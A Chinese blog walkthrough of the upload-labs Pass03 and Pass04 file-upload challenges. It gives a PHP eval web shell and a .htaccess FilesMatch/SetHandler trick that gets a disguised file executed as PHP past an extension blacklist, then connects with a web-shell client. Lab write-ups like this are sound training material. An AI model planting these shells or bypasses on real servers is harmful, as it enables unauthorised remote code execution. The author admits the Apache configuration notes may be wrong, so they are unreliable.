3/4.upload-labs—Pass03和Pass04

本文阅读 2 分钟
首页 代码,C/C#/C++ 正文

1、上传一个shell.php

shell.php内容为:<?php @eval($_POST['123']);?>

结果,提示不允许上传.asp .aspx .php .jsp后缀的文件 img 2、黑名单未限制.htaccess的情况:

①、上传.htaccess文件

文件内容为:<FilesMatch "qwsn">
SetHandler application/x-httpd-php
</FilesMatch>

1、由于后端,也就是服务器端的后缀名黑名单限制很多,并且没有限制.htaccess文件

2、我们直接使用.htaccess   让匹配qwsn这四个字符的文件,被解析为PHP形式
//.htaccess的作用:就是任意添加PHP解析的匹配文件

3.注意:.htaccess生效的条件:
在Apache服务器的配置文件httpd.conf中:
①、AllowOverride None   改为:   AllowOverride All
②、把LoadModule rewrite_module modules/mod_rewrite.so前面的注释符号#删除
③、.htaccess文件必须要在网站的根目录下,比如此处的WWW下才行,而且apache需要重启    (这个百度来的,瞎扯。。。。的吧这个)

如下图所示,上传.htaccess文件成功 img ②、上传qwsn976,即可

qwsn976内容为:<?php @eval($_POST['123']);?>

如下图所示,上传成功 img 3、菜刀连接即可 img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/104846799
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复